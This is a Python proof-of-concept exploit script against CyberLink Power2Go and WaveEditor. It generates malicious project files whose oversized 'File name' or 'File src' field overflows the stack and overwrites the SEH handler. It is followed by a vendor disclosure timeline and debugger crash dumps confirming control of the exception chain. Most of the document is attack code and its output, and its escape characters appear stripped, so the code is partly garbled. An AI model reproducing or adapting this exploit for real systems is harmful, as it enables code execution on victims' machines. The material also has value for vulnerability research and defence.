#!/usr/bin/python
# 
# Exploit Title: CyberLink Multiple Products File Project Handling Stack Buffer Overflow POC
# by: modpr0be[at]spentera[dot]com (@modpr0be)
# Platform: Windows
# Tested on: Windows XP SP3, Windows 7 SP1 with:
# 	CyberLink Power2Go 7 (build 196)
# 	CyberLink Power2Go 8 (build 1031)
# 	CyberLink WaveEditor 2.0 (build 2204)
# Software Link: http://www.cyberlink.com/downloads/trials/index_en_US.html
# CVE : -

### Software Description
# CyberLink Power2Go is all-media disc burning software. 
# Copy all your media to any disc with Power2Go 8! With new System Recovery tools 
# and over 5000 free DVD menus to choose from on DirectorZone.com, Power2Go 8 not 
# only burns everything but allows you to create pro-like DVDs, rip CDs and 
# safeguard valuable data. 

# CyberLink Wave Editor will help user to convert audio format when producing, editing, 
# or creating backups for some audios or videos. This additional tools is also included 
# since PowerDirector 9 to PowerDirector 10, and now included on Power2Go 8.

### Vulnerability Details
# Most of CyberLink products contain built-in project file with their own format and
# extension. This file usually contains our recently modified project or work.
# Most of this filetypes contain this section:
#     <File src=
#     <File name=
# Generally, those sections will be filled with source path or filename. 
# both products will lead us to command execution because the address of 
# SE Handler is overwritten with 0x00410041.

# Notes:
# I cannot find any good return address for WaveEditor, if you can make it
# through the hard way, kudos!!

### Vendor logs:
# 10/10/2011 - Bug found
# 10/11/2011 - Vendor contacted
# 10/11/2011 - Vendor replied and requested POC
# 10/11/2011 - POC sent to vendor
# 10/31/2011 - Vendor said the POC will be researched
# 10/27/2011 - Submitted to CERT
# 11/09/2011 - CyberLink updated the product
# 11/09/2011 - POC still works on the latest version
# 12/09/2011 - No response from vendor, POC release.

import time,sys

def power2go():
	# header for power2go
	header = (
	"x3cx50x72x6fx6ax65x63x74x20x6dx61x67x69x63"
	"x3dx22x69x6ex73x65x63x75x72x69x74x79x22x20"
	"x76x65x72x73x69x6fx6ex3dx22x31x30x31x22x3e"
	"x0dx0ax3cx49x6ex66x6fx72x6dx61x74x69x6fx6e"
	"x2fx3ex0dx0ax3cx43x6fx6dx70x69x6cx61x74x69"
	"x6fx6ex3ex0dx0ax3cx44x61x74x61x44x69x73x63"
	"x20x0dx0ax64x69x73x63x4ex61x6dx65x3dx22x49"
	"x4ex53x45x43x55x52x49x54x59x22x20x0dx0ax66"
	"x69x6cx65x44x61x74x65x3dx22x6fx72x69x67x69"
	"x6ex61x6cx22x20x66x69x6cx65x54x69x6dx65x3d"
	"x22x30x22x20x0dx0ax64x69x73x63x54x79x70x65"
	"x3dx22x63x64x22x20x0dx0ax73x65x73x73x69x6f"
	"x6ex53x69x7ax65x3dx22x30x22x20x0dx0ax50x4f"
	"x57x42x75x72x6ex65x64x53x69x7ax65x3dx22x30"
	"x22x20x0dx0ax53x65x63x75x72x65x64x44x61x74"
	"x61x3dx22x66x61x6cx73x65x22x20x0dx0ax57x68"
	"x6fx6cx65x53x65x63x75x72x65x64x44x61x74x61"
	"x3dx22x66x61x6cx73x65x22x20x0dx0ax53x65x63"
	"x75x72x69x74x79x4bx65x79x53x69x7ax65x3dx22"
	"x31x36x22x20x0dx0ax48x69x64x65x46x69x6cx65"
	"x4ex61x6dx65x3dx22x66x61x6cx73x65x22x20x0d"
	"x0ax62x6fx6fx74x61x62x6cx65x3dx22x66x61x6c"
	"x73x65x22x20x0dx0ax62x6fx6fx74x46x6cx6fx70"
	"x70x79x3dx22x66x61x6cx73x65x22x20x0dx0ax62"
	"x6fx6fx74x49x6dx61x67x65x3dx22x22x20x0dx0a"
	"x61x75x74x6fx52x75x6ex45x78x65x3dx22x66x61"
	"x6cx73x65x22x20x0dx0ax61x75x74x6fx52x75x6e"
	"x45x78x65x50x61x74x68x3dx22x22x20x0dx0ax61"
	"x75x74x6fx52x75x6ex49x63x6fx6ex3dx22x66x61"
	"x6cx73x65x22x20x0dx0ax61x75x74x6fx52x75x6e"
	"x49x63x6fx6ex50x61x74x68x3dx22x22x20x0dx0a"
	"x41x75x74x6fx53x70x6cx69x74x44x69x73x63x3d"
	"x22x66x61x6cx73x65x22x20x0dx0ax44x69x73x63"
	"x53x70x6cx69x74x3dx22x66x61x6cx73x65x22x20"
	"x0dx0ax41x75x74x6fx4fx76x65x72x42x75x72x6e"
	"x3dx22x66x61x6cx73x65x22x20x0dx0ax44x61x74"
	"x61x50x72x6ax74x6fx56x69x64x65x6fx50x72x6a"
	"x3dx22x66x61x6cx73x65x22x20x0dx0ax73x69x6d"
	"x75x6cx61x74x69x6fx6ex3dx22x66x61x6cx73x65"
	"x22x20x0dx0ax62x75x72x6ex50x72x6fx6fx66x3d"
	"x22x74x72x75x65x22x20x0dx0ax63x6cx6fx73x65"
	"x44x69x73x63x3dx22x66x61x6cx73x65x22x20x0d"
	"x0ax76x65x72x69x66x79x44x69x73x63x3dx22x66"
	"x61x6cx73x65x22x20x0dx0ax64x65x66x65x63x74"
	"x6dx61x6ex61x67x65x6dx65x6ex74x3dx22x66x61"
	"x6cx73x65x22x20x0dx0ax63x6fx70x69x65x73x3d"
	"x22x31x22x20x0dx0ax62x75x72x6ex53x70x65x65"
	"x64x3dx22x30x22x20x0dx0ax63x64x54x65x78x74"
	"x3dx22x66x61x6cx73x65x22x20x0dx0ax41x75x64"
	"x69x6fx4ex6fx72x6dx61x6cx69x7ax65x3dx22x66"
	"x61x6cx73x65x22x20x0dx0ax41x75x64x69x6fx47"
	"x61x70x54x69x6dx65x3dx22x32x22x20x0dx0ax46"
	"x69x6cx65x53x79x73x74x65x6dx3dx22x49x53x4f"
	"x39x36x36x30x5fx4ax4fx4cx49x45x54x22x3e")

	body = (
	"x73x72x63x3dx22x43x3ax5cx61x62x63x2ex74x78"
	"x74x22x20x0dx0ax6fx70x65x72x61x74x69x6fx6e"
	"x3dx22x61x64x64x22x20x0dx0ax62x75x72x6ex73"
	"x74x61x74x75x73x3dx22x6ex6fx74x62x75x72x6e"
	"x22x20x0dx0ax73x69x7ax65x3dx22x32x39x32x38"
	"x36x34x22x20x0dx0ax53x68x6fx77x53x69x7ax65"
	"x3dx22x32x39x32x38x36x34x22x20x0dx0ax41x6c"
	"x6cx6fx77x45x6ex63x72x79x70x74x3dx22x66x61"
	"x6cx73x65x22x20x0dx0ax53x65x63x75x72x65x64"
	"x52x6fx6fx74x3dx22x66x61x6cx73x65x22x20x0d"
	"x0ax66x69x6cx65x54x69x6dx65x3dx22x31x32x39"
	"x33x36x37x33x34x31x35x30x39x37x33x36x38x37"
	"x34x22x20x0dx0ax6fx6cx64x3dx22x66x61x6cx73"
	"x65x22x20x0dx0ax74x65x6dx70x66x69x6cx65x3d"
	"x22x66x61x6cx73x65x22x20x0dx0ax74x65x6dx70"
	"x64x69x72x6cx65x76x65x6cx3dx22x30x22x20x0d"
	"x0ax66x6fx72x61x75x64x69x6fx74x72x61x63x6b"
	"x3dx22x66x61x6cx73x65x22x20x0dx0ax74x61x72"
	"x67x65x74x41x75x64x69x6fx43x44x3dx22x66x61"
	"x6cx73x65x22x20x0dx0ax64x61x74x61x69x74x65"
	"x6dx74x79x70x65x3dx22x30x22x20x0dx0ax6dx76"
	"x70x3dx22x30x22x20x0dx0ax61x75x64x69x6fx53"
	"x75x62x74x79x70x65x3dx22x30x22x2fx3ex0dx0a"
	"x3cx2fx44x61x74x61x44x69x73x63x3ex0dx0ax3c"
	"x2fx43x6fx6dx70x69x6cx61x74x69x6fx6ex3ex0d"
	"x0ax3cx2fx50x72x6fx6ax65x63x74x3e")

	pgfile = "overflow.p2g"
	f = open(pgfile,'w')
	junk = "A" * 778
	nseh = "x42x42"
	seh = "x43x43"
	sisa =  "x44" * 4200

	hell = "x3cx46x69x6cx65" + "rn"	# <File
	hell+= "name=" + '"'+ junk+nseh+seh+sisa + '"'
	try:
		f.write(header+ "rn" + hell + "rn" + body)
		print "[!] Generating", pgfile, ".."
		time.sleep(1)
		print "[+] File", pgfile, "successfully created!"
		print "[*] Now open project file" +" '"+pgfile+"' " + "with CyberLink Power2Go."
		print "[*] Good luck ;)"
		f.close()
	except IOError:
		print "[-] Could not write to destination folder, check permission.."
		sys.exit()

def waveeditor():
	header = ("x3cx50x72x6fx6ax65x63x74x20x41x70x70x6cx69x63x61"
	"x74x69x6fx6ex3dx22x57x61x76x65x45x64x69x74x6fx72x22x20"
	"x56x65x72x73x69x6fx6ex3dx22x32x2ex30x22x3e")

	wvefile = "overflow.wve"
	f = open(wvefile,'w')
	junk = "A" * 3000

	hell = "x3cx46x69x6cx65x20x53x72x63x3d" # <File src=
	hell += '"'+ junk + '"' + "x3e"

	fill = ("x3cx42x6fx6fx6bx6dx61x72x6bx4cx69x73x74x2fx3ex3c"
	"x2fx46x69x6cx65x3ex3cx2fx50x72x6fx6ax65x63x74x3e")
	
	fill = ("x3cx42x6fx6fx6bx6dx61x72x6bx4cx69x73x74x2fx3ex3c"
	"x2fx46x69x6cx65x3ex3cx43x6fx6dx70x69x6cx61x74x69x6fx6e"
	"x3ex3cx41x75x64x69x6fx43x44x20x62x75x72x6ex50x72x6fx6f"
	"x66x3dx22x74x72x75x65x22x20x63x6fx70x69x65x73x3dx22x30"
	"x22x20x62x75x72x6ex53x70x65x65x64x3dx22x30x22x20x41x75"
	"x64x69x6fx4ex6fx72x6dx61x6cx69x7ax65x3dx22x66x61x6cx73"
	"x65x22x20x41x75x64x69x6fx47x61x70x54x69x6dx65x3dx22x32"
	"x22x2fx3ex3cx2fx43x6fx6dx70x69x6cx61x74x69x6fx6ex3ex3c"
	"x2fx50x72x6fx6ax65x63x74x3e")
	
	try:
		f.write(header+hell+fill)
		print "[!] Generating", wvefile, ".."
		time.sleep(1)
		print "[+] File", wvefile, "successfully created!"
		print "[*] Now open project file" +" '"+wvefile+"' " + "with CyberLink WaveEditor."
		print "[*] Good luck ;)"
		f.close()
	except IOError:
		print "[-] Could not write to destination folder, check permission.."
		sys.exit()

print "[*] CyberLink Multiple Products File Project Processing Stack Buffer Overflow POC."
print "[*] by modpr0be <modpr0be[at]spentera[dot]com> | @modpr0be"
print "t1.CyberLink Power2Go <= 8.0"
print "t2.CyberLink WaveEditor <= 2.0"

a = 0
while a < 2:
	a = a + 1
	op = input ("[!] Choose the product: ")
	if op == 1:
		power2go()
		sys.exit()
	elif op == 2:
		waveeditor()
		sys.exit()
	else:
		print "[-] Oh plz.. pick the right one :)rn"


### DUMP OF POWER2GO
#(d18.c60): Break instruction exception - code 80000003 (first chance)
#eax=7ffde000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
#eip=7c90120e esp=07d4ffcc ebp=07d4fff4 iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
#ntdll!DbgBreakPoint:
#7c90120e cc              int     3
#Missing image name, possible paged-out or corrupt data.
#Missing image name, possible paged-out or corrupt data.
#0:022> g
#(d18.d40): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=ec8b55ff ebx=010358b0 ecx=78ad8951 edx=005b12fc esi=00430043 edi=0012d69c
#eip=ec8b55ff esp=0012ca70 ebp=00000000 iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
#ec8b55ff ??              ???
#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:Program FilesCyberLinkPower2Go8Power2Go8.exe - 
#0:000> !exchain
#0012ca9c: Power2Go8!CCLAuMixerAPI::operator=+156ba8 (00560dc8)
#0012d104: Power2Go8!CCLAuMixerAPI::operator=+25e23 (00430043)
#Invalid exception stack at 00420042
#0:000> d 0012d104
#0012d104  42 00 42 00 43 00 43 00-43 00 43 00 43 00 43 00  B.B.C.C.C.C.C.C.
#0012d114  43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00  C.C.C.C.C.C.C.C.
#0012d124  43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00  C.C.C.C.C.C.C.C.
#0012d134  43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00  C.C.C.C.C.C.C.C.
#0012d144  43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00  C.C.C.C.C.C.C.C.
#0012d154  43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00  C.C.C.C.C.C.C.C.
#0012d164  43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00  C.C.C.C.C.C.C.C.
#0012d174  43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00  C.C.C.C.C.C.C.C.


### DUMP OF WAVE EDITOR
#(e44.734): Break instruction exception - code 80000003 (first chance)
#eax=7ffd9000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
#eip=7c90120e esp=00e5ffcc ebp=00e5fff4 iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
#ntdll!DbgBreakPoint:
#7c90120e cc              int     3
#Missing image name, possible paged-out or corrupt data.
#Missing image name, possible paged-out or corrupt data.
#0:016> g
#(e44.e48): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00410041 ebx=ffffffff ecx=0240868b edx=420b1802 esi=022ccbe8 edi=00d2f848
#eip=024c47af esp=0012c424 ebp=0012c42c iopl=0         nv up ei pl nz na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:Program FilesCyberLinkWaveEditorWaveKernel.dll -
#WaveKernel!ReleaseWaveKernelClient+0x12a8f:
#024c47af 8b4208          mov     eax,dword ptr [edx+8] ds:0023:420b180a=????????
#Missing image name, possible paged-out or corrupt data.
#Missing image name, possible paged-out or corrupt data.
#0:000> !exchain
#0012c898: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:Program FilesCyberLinkWaveEditorWaveEditor.exe -
#WaveEditor!CCLAuMixerAPI::CCLAuMixerAPI+da61 (00410041)
#Invalid exception stack at 00410041
#0:000> d 0012c898
#0012c898  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
#0012c8a8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
#0012c8b8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
#0012c8c8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
#0012c8d8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
#0012c8e8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
#0012c8f8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
#0012c908  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
#